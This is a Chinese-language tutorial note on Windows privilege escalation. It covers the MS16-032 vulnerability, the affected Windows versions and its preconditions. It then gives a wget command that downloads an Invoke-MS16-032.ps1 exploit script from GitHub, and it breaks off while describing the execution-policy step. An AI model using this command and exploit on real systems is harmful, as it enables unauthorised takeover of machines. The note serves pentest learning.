咕咕咕。。。
提权目的:低权限到高权限,从而扩大战果
手段:
- 本地溢出漏洞提权(未打补丁前提下)
- 数据库提权
- 第三方软件提权(向日葵,teamview~)
1本地溢出漏洞提权:用户输入的数据超过了缓存区的长度
ms16-032漏洞,这个漏洞是16年发布的,版本对象是
以普通用户的身份添加administrator以system权限运行程序
条件:目标机要有两个以上的cpu核心,并且powershell是v2.0及更高版本
Windows Vista
Windows 7
Windows 8.1
Windows 10
Windows 2008 Server
Windows 2012 Server
利用步骤:
1下载ps1文件
wget https://raw.githubusercontent.com/Ridter/Pentest/master /powershell/MyShell/Invoke-MS16-032.ps1
ps:linux中wegt、apt-get、pip三种安装命令的区别的博客:
https://blog.csdn.net/weixin_43286092/article/details/102095209
2设置执行策略:任何powershe